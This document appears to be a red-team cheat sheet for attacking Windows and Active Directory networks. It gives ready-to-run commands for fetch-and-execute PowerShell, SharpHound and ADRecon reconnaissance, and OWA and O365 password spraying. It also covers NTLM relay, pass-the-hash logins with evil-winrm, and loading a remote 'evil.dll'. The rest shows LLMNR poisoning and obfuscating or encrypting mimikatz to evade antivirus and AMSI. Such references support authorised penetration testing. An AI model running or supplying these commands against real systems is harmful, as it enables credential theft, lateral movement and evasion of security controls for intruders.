https://amsi.fail/
Import-Module .\WinPwn.ps1
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
https://github.com/GhostPack
Seatbelt, KeeThief, Rubeus, SharpUp ...
PowerView, PowerUp, Get-GPPPassword ...
SharpHound.exe -d testdomain.com -c all,gpolocalgroup
SharpHound.ps1 -d testdomain.com -c all,gpolocalgroup
bloodhound.py -c all
https://github.com/adrecon/ADRecon
To run ADRecon on a domain member host.
PS C:\> .\ADRecon.ps1
To run ADRecon on a domain member host as a different user.
PS C:\> .\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username>
To run ADRecon on a non-member host using LDAP.
PS C:\> .\ADRecon.ps1 -Method LDAP -DomainController <IP or FQDN> -Credential <domain\username>
Lync/Skype & OWA sprayer, wordlist-generator, naming scheme converter etc.
Spraying OWA
./atomizer.py owa contoso.com 'Fall2018' emails.txt
Spraying Lync
./atomizer lync contoso.com --user-as-pass usernames.txt
Recon mode
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
Attack OWA & EWS
The naming scheme should look like testdomain.com\schmidta or aschmidt -> check the scheme with the msf module
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt
Get-ADUsernameFromEWS -EmailList email-list.txt
Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Fall2016 -OutFile global-address-list.txt
https://github.com/0xZDH/msspray
O365 Enum & Spray Tool
Only enumerate users without spraying. Needs a text file with complete mail addresses [email protected]
python3 msspray.py -e -u textfile.txt --wait 10 --verbose
O365 Sprayer
Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
Attack EWS via NTLM Authentication over HTTP.
./exchangeRelayx.py -t https://mail.quickbreach.com
Port of PowerView to .NET
SharpView.exe Get-DomainController -Domain test.local -Server dc.test.local -Credential [email protected]/password
Gather mail addresses / users
python3 crosslinked.py -f '{first}.{last}@domain.com' company_name
Official documentation: https://mpgn.gitbook.io/crackmapexec/
https://github.com/mrnamp/EvilWinRM
A tool to interact with Microsoft's WS-Management implementation (aka PowerShell Remoting) from a Linux box.
Can also be used to connect with a hash instead of a password.
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -H B3D7E7E1516FFBFCB1C54A4C349BC099
Also capable of executing C# assemblies, DLLs or donut shellcode afterwards directly in memory. The executables must be in the path set with the -e argument.
Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'
Dll-loader -http -path http://10.11.12.13/evil.dll
Donut-Loader -process_id 1234 -donutfile /usr/share/payload.bin
Can also bypass AMSI, fetch Kerberos tickets and so on ...
Execute commands over RDP. The user will get a notification if multi-session RDP is not enabled!
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
PowerShell ADIDNS/LLMNR/mDNS/NBNS/DNS spoofer and man-in-the-middle tool
Import-Module Inveigh.psm1
Invoke-Inveigh -Consoleoutput Y
https://github.com/lgandx/Responder
LLMNR/NBT-NS/mDNS Poisoner
./Responder.py -I eth0
https://github.com/cobbr/Covenant
https://github.com/SecWiki
Exploits for Linux & Windows
https://github.com/p3nt4/PowerShdll
Powershell without Powershell
rundll32 PowerShdll,main -w
https://github.com/hfiref0x/UACME
https://github.com/phra/PEzor
Obfuscate C / C++ binaries
New module -> shellcode fluctuation:
PEzor -fluctuate=RW -debug mimikatz.exe -p '"coffee" "sleep 5000" "coffee" "exit"'
Fork of Donut shellcode / PE generator with syscalls
https://github.com/EgeBalci/amber
Obfuscate C / C++ binaries
Obfuscator for PowerShell scripts.
https://github.com/the-xentropy/xencrypt / https://github.com/GetRektBoy724/BetterXencrypt
Collection of tools to bypass AV/EDR and similar.
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100
Obfuscator and encrypter for PowerShell scripts.
Tools collection for PowerShell ISE. Obfuscation possibilities.
Convert PS1 to EXE file.
A wrapper for C# binaries that encrypts the payload and decrypts it in memory.
Encrypt binary:
Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc
Load encrypted binary from URL:
Invoke-SharpLoader -location https://raw.githubusercontent.com/S3cur3Th1sSh1t/Invoke-SharpLoader/master/EncryptedCSharp/SafetyKatz.enc -password S3cur3Th1sSh1t -noArgs
Load encrypted binary from disk with commandline arguments:
Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"
Obfuscator for C# and Powershell
PowerShell Script obfuscator
C# assembly obfuscator
C# assembly obfuscator
https://github.com/9emin1/charlotte
Shellcode Loader via D-Invoke
C/C++ source obfuscator
SharpSploit: https://github.com/cobbr/SharpSploit
ZeroLogon-Tester: https://github.com/BC-SECURITY/Invoke-ZeroLogon / https://github.com/SecuraBV/CVE-2020-1472
Ligolo: https://github.com/sysdream/ligolo
Metasploit: https://github.com/rapid7/metasploit-framework
Socat: https://github.com/craSH/socat
ThreatCheck: https://github.com/rasta-mouse/ThreatCheck
evilginx2: https://github.com/kgretzky/evilginx2
O365 Enum: https://github.com/gremwell/o365enum
O365 spray: https://github.com/0xZDH/o365spray